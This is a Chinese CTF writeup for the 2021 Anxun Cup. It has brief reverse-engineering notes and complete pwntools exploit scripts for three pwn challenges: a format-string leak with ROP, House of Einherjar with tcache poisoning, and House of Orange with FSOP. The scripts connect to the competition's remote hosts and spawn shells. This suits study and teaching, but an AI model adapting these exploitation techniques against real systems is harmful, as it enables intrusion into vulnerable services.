411D80应该是420000数组的初始化函数,然而,420000数组内已经有东西了,并不是我们想的000000000(全局变量是这样的),说明题意大概就是根据420000内的数据,算出42024C的数据,1F和E0这两个数很特殊,看懂了吗,一个取高3位,一个取低5位
文章图片
文章图片
算法就如下吧,不过多阐述了,直接看代码
文章图片
sign in
有部分smc,直接用ODdump出来
文章图片
发现就是算法段
文章图片
先是一个xor操作
文章图片
进行置换操作,打乱字符顺序,并保存
文章图片
先加密,然后结果去比较
文章图片
有点像tea算法
文章图片
V5我们不得而知,但是我们可以知道的是42CA44小于256,所以可以爆破
文章图片
脚本如下
文章图片
PWN ez_stack
from pwn import*context.log_level = "debug"#io = process("./ezstack")
io = remote("47.108.195.119","20113")def enter():
io.recv()
io.sendline("Light1ng")
io.recv()
io.sendline("wwsbb!")enter()
io.sendline("%11$p%17$pa")
io.recvuntil("0x")
canary = int(io.recv(16),16)
io.recvuntil("0x")
main = int(io.recv(12),16)
pie = main - 0x9dc
ret = pie + 0x7c1
sh_addr = pie + 0xB24
system_plt = pie + 0x810
pop_rdi_ret = pie + 0xb03
success("canary:"+hex(canary))
success("pie:"+hex(pie))payload =p64(0)*3 + p64(canary) + p64(0xdeadbeef) + p64(ret) + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_plt)io.recvline()
io.sendline(payload)
io.interactive()
文章图片
如图 main_offset 为0xb + 6
canary_offset 为 0x5 + 6
第一发payload 通过泄露main地址得到程序基地址 和 canary
第二发payload 直接ret2libc shell
noleak
libc2.7 漏洞点为edit时的off by null
因为无size限制 直接先申请大chunk 然后释放进unsorted bin
然后在申请该unsortedbin的一部分 直接show得到libc
然后就是House Of Einherjar 需要注意填满tcache即可。
from pwn import*context.log_level = "debug"io = remote("47.108.195.119","20182")
#io = process("./pwn")def menu(choice):
io.sendlineafter("4) delete a chunk",str(choice))def add(index,size):
menu(1)
io.sendlineafter("Index?",str(index))
io.sendlineafter("Size?",str(size))def delete(index):
menu(4)
io.sendlineafter("Index?",str(index))def show(index):
menu(2)
io.sendlineafter("Index?",str(index))def edit(index,content):
menu(3)
io.sendlineafter("Index?",str(index))
io.sendlineafter("content:",content)def look():
global io
gdb.attach(io)def enter():
io.recv()
io.sendline("Light1ng")
io.recv()
io.sendline("wwsbb!")def secret():
enter()
io.sendlineafter("please input a str:","N0_py_1n_tHe_ct7")def look():
global io
gdb.attach(io)#leak_libc
secret()
add(0,0x420)
add(1,0x18)
delete(0)
add(0,0x18)
show(0)
io.recvuntil("\n")
info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
libc = ELF("./libc.so.6",checksec = 0)
malloc_hook = info - 1104 - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
add(0,0x400)#
add(0,0xf8)
add(1,0x18)
add(2,0xf8)
for i in range(3,10):
add(i,0xf8)
for i in range(3,10):
delete(i)#
delete(0)
edit(1,p64(0)*2+p64(0x100+0x20))
delete(2)add(3,0xd0)
add(4,0x18)
add(5,0x18)
add(6,0x18)
delete(6)
delete(1)
edit(5,p64(free_hook))add(7,0x18)
add(8,0x18)
edit(7,"/bin/sh\x00")
edit(8,p64(system))
delete(7)
io.interactive()
ez_heap
跟HITCON——houseoforange几乎一模一样
都是不限制size 然后漏洞为堆块溢出 只有add edit show
参考博客 :
https://blog.csdn.net/A951860555/article/details/116425824?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link
【CTF|2021年第四届“安洵杯”网络安全挑战赛Writeup】house of orange 泄露出libc 然后unsorted bin attack + FSOP attack
from pwn import*context.log_level = "debug"io = process("./pwn")#io = remote("47.108.195.119","20141")def menu(choice):
io.sendlineafter("Your choice : ",str(choice))def add(size,content):
menu(1)
io.sendlineafter("it\n",str(size))
io.sendlineafter("?\n",content)def edit(size,content):
menu(2)
io.sendlineafter("it\n",str(size))
io.sendafter("name\n",content)def show():
menu(3)def look():
global io
gdb.attach(io)def enter():
io.recv()
io.sendline("Light1ng")
io.recv()
io.sendline("wwsbb!")#gdb.attach(p)
#enter()
add(0x10, "a")
edit(0x20,p64(0)*3+p64(0xfc1))add(0x1000,"top_chunk to the unsorted_bin")#fuck the libc and heap through the largebin
add(0x400,b"a"*8)
show()
libc = ELF("./libc.so.6",checksec = 0)
libc_info = u64(io.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
main_arena = libc_info- 1514
malloc_hook = main_arena - 0x10
libc_base = malloc_hook - libc.sym["__malloc_hook"]
io_list_all = libc_base+libc.sym["_IO_list_all"]
system = libc_base+libc.sym["system"]edit(0x10,b"a"*0x10)
show()
io.recvuntil(b"a"*0x10)
heap_info = u64(io.recvuntil("\n",drop = True).ljust(8,b"\x00"))
heap_base = heap_info & 0xfffffffffffff000# unsorted_bin attack + FSOP
pad = cyclic(0x400)fsop = b"/bin/sh\x00"+p64(0x61)+p64(0)+p64(io_list_all-0x10)
fsop += p64(0)+p64(1)
fsop = fsop.ljust(0xd8, b"\x00")
vtable_addr = heap_base+0x530
fsop += p64(vtable_addr)
fsop += p64(0)*3+p64(system)
pad += fsop
print(hex(system))
print(hex(io_list_all))edit(len(pad),pad)
print(hex(heap_base))menu(1)
io.sendlineafter("it\n",str(0x18))io.interactive()推荐阅读
- CTF|2021DASCTF八月挑战赛Writeup
- web安全|2022 Real World CTF体验赛Writeup
- hack|安全测试者偏爱的安全测试工具
- 渗透小圈|信息收集那些事
- 安全测试|1. 安全测试法规和专业术语介绍
- 系统安全与恶意代码分析|[系统安全] 三十二.恶意代码检测(2)常用技术详解及总结
- java|我们一起学一学渗透测试——基础概念
- 安全|Kali Linux工具大全-信息收集
- python|【十年网络安全工程师整理】—100渗透测试工具使用方法介绍